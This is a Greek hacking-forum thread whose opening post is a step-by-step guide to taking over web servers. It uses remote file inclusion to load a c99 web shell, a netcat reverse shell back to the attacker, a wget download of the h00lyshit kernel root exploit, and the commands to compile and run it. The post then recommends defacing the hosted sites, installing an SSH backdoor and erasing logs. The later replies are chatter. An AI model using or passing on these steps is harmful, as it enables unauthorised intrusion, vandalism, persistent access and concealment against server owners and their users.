MhtCeR™ Posted October 5, 2010 Posted October 5, 2010 Τα root exploits μας βοηθάνε να αποκτήσουμε δικαιώματα διαχειριστή σε ένα server. Στο παράδειγμα που ακολουθεί σε server με Safe Mod: OFF χρειαζόμαστε: 1)Ένα site/forum με λανθασμένο κώδικα που θα μας επιτρέψει να τρέξουμε ένα shell από τον δικό μας server R.F.I η ένα shell στον server που θα έχουμε ανεβάσει με κάποιο τρόπο p.x: ftp. 2)Ένα shell (c99,r57,storm,locus) η κάποιο άλλο τις επιλογής σας. (Προσοχή γιατί πολλά είναι backdoor και στέλνουν πληροφορίες σε κάποιον χρηστη για το που έχετε το shell,σε ποιον server. http://rapidshare.com/files/164111549/c99.rar 3)Προώθηση μιας πόρτας στο router σας p.x: 1500 4)Ένα προγραμματάκι : Netcat V1.1 http://rapidshare.com/files/164104973/NETCAT_V1.1.rar 5)Root exploit το οποιο πρέπει να ταιριάζει με την έκδοση του πυρήνα του server. Βρίσκουμε λοιπόν ένα site/forum με λανθασμένο κώδικα που θα μας επιτρέψει να τρέξουμε ένα shell από τον δικό μας server R.F.I όπως στο παράδειγμα πιο κάτω: http://www.server.com/forum/index.php?page= Μπορούμε να τρέξουμε από το δικό μας server το shell προσθέτοντας το δικό μας σύνδεσμο link στο τέλος: http://www.server.com/forum/index.php?page=http://www.myserver.com/shell.txt? Αυτό το link θα μας φορτώσει το shell όπου μπορούμε να δούμε την έκδοση του πυρήνα p.x: Μετά από αυτό πρέπει να δημιουργήσουμε μια σύνδεση back connect με τον server χρησιμοποιώντας το ενσωματωμένο module του shell η ανεβάζοντας ένα δικό μας σε ένα φάκελο που μας δίνη το δικαίωμα (writeable). Το πιο εύκολο είναι με το ενσωματωμένο back connect. Ανοίγουμε λοιπόν το Netcat ώστε να είναι σε αναμονή και να περιμένει να γίνει η σύνδεση με το shell πηγαίνοντας: Έναρξη -> Εκτέλεση -> και πληκτρολογούμε cmd Μετά πηγαίνουμε στον φάκελο που είναι εγκατεστημένο το NetCat: π.χ cd C:\test\Netcat Και δίνουμε την παρακάτω εντολή: nc -l -v -n -p 1500 Το NetCat θα μας βγάλει: listening on [any] 1500 ... Στην κεντρική σελίδα του c99 shell πηγαίνουμε εκεί που λέει Tools και στην δεύτερη σειρά παρατηρούμε το Back connection: Εκεί που λέει HOST: βάζουμε την ip μας (μπορούμε να την βρούμε πηγαίνοντας στο site: www.whatismyip.com) και διπλα που λέει Port: 1500 (Είναι η πόρτα που έχουμε ανοίξει στο router μας) Μετά πατάμε connect. Αν τα έχουμε κάνει όλα σωστά θα πρέπει να συνδεθούμε με το netcat και προχωράμε στην διαδικασία του exploit. Θα πρέπει να βρούμε ένα ένα φάκελο που μας δίνει το δικαίωμα (writeable) για να κατεβάσουμε και να κάνουμε compile το Root Exploit, το οποίο θα μας δώσει δικαιώματα διαχειριστή στον server. Για να βρούμε ένα φάκελο που μας δίνει το δικαίωμα (writeable) μπορούμε να τρέξουμε την παρακάτω εντολή: find / -perm -2 -ls ή να χρησιμοποιήσουμε το φάκελο tmp που έχει πάντα δικαιώματα writeable. Ας δούμε την περίπτωση του kernel 2.6.9 και την χρήση του φακέλου tmp. Πληκτρολογούμε: cd /tmp Για να κατεβάσουμε το root exploit (αν δεν το έχουμε ήδη έτοιμο compile) χρησιμοποιούμε την εντολή wget: wget http://www.servermeexploits.com/h00lyshit.c Μόλις το κατεβάσουμε θα πρέπει να κάνουμε compile ακολουθώντας τις οδηγίες που βρίσκουμε συνήθως στον κώδικα του exploit. Για το h00lyshit πληκτρολογούμε: gcc h00lyshit.c -o h00lyshit Έτσι δημιουργούμε το εκτελέσιμο αρχείο h00lyshit. Τώρα πρέπει για να το τρέξουμε να δημιουργήσουμε ένα μεγάλο αρχείο στο δίσκο το οποιο χρειάζεται για την σωστή εκτέλεση του. Για να δημιουργήσουμε ένα τέτοιο αρχείο σε κάποιο writeable φάκελο η στο /tmp όπως φαίνεται πιο κάτω στο παράδειγμα μας δίνουμε την εντολή: dd if=/dev/urandom of=largefile count=2M ("largefile" είναι το όνομα αρχείου που δίνουμε) Περιμένουμε μερικά λεπτά (2-3) μέχρι να ολοκληρωθεί η διαδικασία. Αν δεν ολοκληρωθεί με επιτυχία μπορούμε να δοκιμάσουμε την εντολή: dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024 Στο τελευταίο στάδιο που είναι η εκτέλεση του exploit δίνουμε την εντολή: ./h00lyshit /tmp/largefile Αν στον server δεν έχει περαστεί το patch για τον συγκεκριμένο πυρήνα (kernel) θα μας δόση δικαιώματα διαχειριστή (root). Για να το δούμε αυτό πατάμε: whoami Αν μας βγάλει root τότε τα κάναμε όλα σωστά ! Σαν root μπορούμε να κάνουμε όλα τα sites/forums/ deface του server η να βάλουμε κάποιο ssh backdoor όπως το SSHDoor. Καλό θα είναι μετά από όλα αυτά να χρησιμοποιήσουμε κάπιο Log Cleaner όπως το MIG Log Cleaner. Άν βρήτε κάπιο λάθος πείτε μου να το φτιάξω. :) Credits: *Vazelos* (ο οποίος το έστειλε λίγο παλιά στο maxhackers.com)
Morian Posted October 10, 2010 Posted October 10, 2010 Gia pion logo kaneis bump? Afou blepeis oti dn postaroun h den tous aresei to topic h den se xoneboun (lol)
MhtCeR™ Posted October 10, 2010 Author Posted October 10, 2010 Gia pion logo kaneis bump? Afou blepeis oti dn postaroun h den tous aresei to topic h den se xoneboun (lol) xD το τελευταίο κάνω σα να μην το είδα :) για τα άλλα δεν ξέρω.... εμένα μου φένεται χρήσιμο guide...
Angel Of Death Posted October 11, 2010 Posted October 11, 2010 To guide xrisimo einai, alla poios 8a katsei na ta diabasei ola ayta, poso mallon na ta kanei ki olas.
MhtCeR™ Posted October 11, 2010 Author Posted October 11, 2010 To guide xrisimo einai, alla poios 8a katsei na ta diabasei ola ayta, poso mallon na ta kanei ki olas. nai dikio exeis... oloi ektos apo legendary,gold,kai moderator einai tempeloskila xD... (e3erountai PANTA kapioi opws ton Coyote™) EDITED: thnx kiolas :)
CarmineAngelo Posted October 12, 2010 Posted October 12, 2010 Δεν καταλαβα, περνουμε τζαμπα .com σιτε η κλεινουμε ενα site βοηθα
Panic* Posted October 28, 2010 Posted October 28, 2010 Δεν καταλαβα, περνουμε τζαμπα .com σιτε η κλεινουμε ενα site βοηθα
d0ds™ Posted November 3, 2010 Posted November 3, 2010 translation please? :| translate here http://www.google.com/language_tools
HackMeUpReturns Posted November 7, 2010 Posted November 7, 2010 Kala poso axrhstoi einai sto MxC. den mporun na katalavun auta ta apla pragmata.. Egw doulevw me metasploit pada!
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now